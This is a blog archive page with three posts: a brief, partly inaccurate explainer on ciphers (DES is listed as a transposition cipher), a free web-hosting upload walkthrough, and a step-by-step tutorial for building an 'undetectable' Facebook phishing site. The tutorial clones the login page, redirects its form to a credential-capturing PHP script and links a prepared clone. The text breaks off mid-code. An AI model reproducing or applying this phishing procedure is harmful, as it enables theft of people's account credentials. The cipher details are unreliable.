Posts

Showing posts from March, 2017

What is a Cipher?

Ciphers are the specific algorithms which are used to encrypt and decrypt data.   A cipher is series of well-defined steps that can be followed as a procedure to encrypt and decrypt messages. Cipher Methods                   Transposition Cipher ·          No letters are replaced. They are simply rearranged. ·          E.g.:  Backward cipher                 Rail fence cipher                 Scytale                 DES/3DES                   One Time Pad ·          Key is consisting of arbitrarily long, non-repeated sequence of numbers. ·          Key length = message length in number of characters ·          Key is combined character by character with plain text by using XOR to produce cipher text. ·          Many Time Pods – if the key is used for more than once.

How to upload files to a free hosting website?

Image
This tutorial describes how to create an account and how to upload files to a free hosting website with pictures? Here  www.000webhost.com is used to demostrate the steps. Step 1 : Create an account Go to  https://www.000webhost.com/free-website-sign-up Enter a valid email address, password and a name for your site. For E.g: nextpagexyz  Click GET FREE HOSTING Step 2 :  After you login this is how it looks like. Click Upload files. Step 3 : Click Upload files now Step 4 : Click public_html Step 5 : Delete .htaccess file Right click on the file Click Delete Step 6 : Click Upload files Step 7 : Click Select files Step 8 : Select files you want to upload and Click Open Step 9 : Click Uplo

How to do a Phishing attack on Facebook?

Image
This is a Step by step tutorial to make an undetectable Facebook phishing site. Step 1: Download page source Go to https://www.facebook.com Right click on the blank area -> Click Save As When dialog box appears select ‘Webpage, complete’ as Save as type -> Click Save Step 2: Edit “Facebook - Log In or Sign Up.html” file and rename it. Open ‘Facebook - Log In or Sign Up.html’ file with notepad or Dreamweaver. Remove all the ajax codes. (You can download HTML file which removed all ajax codes form here https://github.com/nimeshikaranasinghe/Facebook-Phisihing.git   ) Search for login action (Press Ctrl + F -> type ‘ action= ’ -> Click Find Next) Replace the highlighted part (as in the following screenshot) with getDetails.php Save the file as index.html Step 3: Create getDetails.php Open a notepad. Type the following code <?php             $username = $_POS